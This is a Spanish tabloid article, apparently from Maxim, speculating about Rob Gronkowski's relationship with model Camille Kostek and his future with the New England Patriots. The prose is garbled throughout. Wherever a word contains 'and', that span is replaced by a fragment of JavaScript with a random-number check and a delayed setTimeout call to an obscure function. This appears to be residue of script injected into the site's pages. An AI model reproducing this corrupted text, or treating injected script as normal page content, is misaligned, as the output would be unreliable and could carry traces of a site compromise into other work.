ROB GRONKOWSKI SE REUNE CON LA MODELO CAMILLE KOSTEK

    ROB GRONKOWSKI SE REUNE CON LA MODELO CAMILLE KOSTEK

    Que estarán tramandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando.. Gronkowski se sacó la lotería.

    Autor: Redacción Maxim 19 abril, 2018


    FOTO: Instagram @camillekostek

    Juzgandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando por las fotos y videos sexys de la novia, creemos que vive su mejor momento.

     

     

    Como el futuro de Rob Gronkowski con los New Englandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Patriots sigue siendo incierto, la megaestrella de la NFL parece haberse recuperado con Camille Kostek. No te pierdas sus fotos:

     

     

    HEY HEY L A ? I’m back ? #MOOD

    A post shared by Camille Kostek (@camillekostek) on

     

     

     

     

     

    ? . ? @timgrasint

    A post shared by Camille Kostek (@camillekostek) on

     

    La ex animadora de Pats usó a Gronk como «esquí acuático humano» en un video publicado en Instagram.

     

    FOTO: Instagram @camillekostek

     

    No te pierdas el video de Sara Underwood desnuda en la selva.

     

     

    La pareja ha tenido una relación intermitente desde que Kostek renunció a la escuadra de animadores de los Patriots en 2015, según una entrevista reciente de Sports Illustrated Swimsuit, Fox News. Considerandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando que este video más reciente fue grabado desde la casa de su abuela, hay razones para creer que actualmente están en una fase «activa».

    Más evidencia surgió la semana pasada cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Kostek publicó una foto diferente junto al lago titulada, «¿Cómo me veo Roberto».

    Si «Roberto» está de vacaciones con Kostek, eso podría explicar por qué se perdió una práctica voluntaria de Patriots a principios de esta semana.

    De nuevo, nadie sabe si continuará jugandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando para New Englandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and después de su derrota en el Super Bowl LII. El ala cerrada le dijo en broma a un cronista deportivo de CBS que quería jugar para los «69ers» y, según los informes, la WWE está dispuesta a darle un contrato.

    El entrenador de los Patriots, Bill Belichick, reveló poco cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando le preguntaron sobre el futuro de sus jugadores con la organización en Orlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a principios de este mes.

    «Tenemos el programa voluntario de temporada baja que comienza el lunes», dijo. «Será muy concurrido, pero sé que hay un par de jugadores con los que he hablado que tienen otros compromisos, pero así son las cosas siempre. Entonces, realmente no hay nada nuevo allí».

     


    Parece que Kostek podría ser la cosa más segura en la vida de Gronkowski. Trata de no ser demasiado envidioso mientras ves sus fotos más calientes de arriba y los increíbles videos de SI Swimsuit a continuación:

     

     

     

     

     

    Temas relacionados con esta nota: , , , , ,

Que estarán tramandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando.. Gronkowski se sacó la lotería.